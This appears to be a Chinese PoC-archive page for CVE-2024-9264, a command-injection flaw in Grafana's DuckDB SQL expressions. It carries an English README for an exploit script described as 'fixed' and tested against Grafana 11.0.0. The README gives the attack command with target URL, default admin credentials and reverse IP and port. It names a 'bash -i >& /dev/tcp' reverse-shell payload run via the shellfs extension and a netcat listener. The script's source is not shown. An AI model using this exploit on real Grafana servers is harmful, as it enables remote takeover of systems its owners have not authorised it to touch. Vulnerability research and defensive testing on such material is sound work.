关联漏洞
标题:
Grafana 安全漏洞
(CVE-2024-9264)
描述:Grafana是Grafana开源的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana存在安全漏洞,该漏洞源于SQL表达式实验性功能在处理用户输入的duckdb查询时,未能充分清理,导致命令注入和本地文件包含漏洞。
介绍
# 🛠️ CVE-2024-9264 - Fixed Grafana RCE Exploit
This is a **fixed version** of the proof-of-concept exploit for **CVE-2024-9264**, a critical remote code execution vulnerability in Grafana (via SQL expressions and DuckDB).
🔗 Original advisory: [Grafana Security Release](https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/)
❌ Original PoC: Broken due to syntax errors and incorrect use of `write_file()`
✅ This version works, tested on a vulnerable Grafana 11.0.0 instance.
---
## ✅ Fixes in this version
- ✅ Correctly uses `writefile()` instead of `write_file()` (DuckDB function)
- ✅ Proper shell payload using `bash -i >& /dev/tcp/...`
- ✅ Reverse shell written and executed successfully via `shellfs` extension
---
## 📦 Requirements
- Grafana instance with:
- DuckDB backend
- Ability to `install shellfs from community`
- A netcat listener on your attacker machine
---
## 🚀 Usage
```bash
python3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
```
Then listen with:
```bash
nc -lvnp 4444
```
---
## ⚠️ Legal Disclaimer
This project is **for educational purposes only**.
Do not use it against targets you do not have permission to test.
---
## ✍️ Author of this Fix
Modified and validated by [Exerr](https://github.com/Exerrdev) — original PoC by z3k0sec.
文件快照
[4.0K] /data/pocs/3652b7b50abb66f58cceda8a6e286568b5583559
├── [3.2K] fpoc.py
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。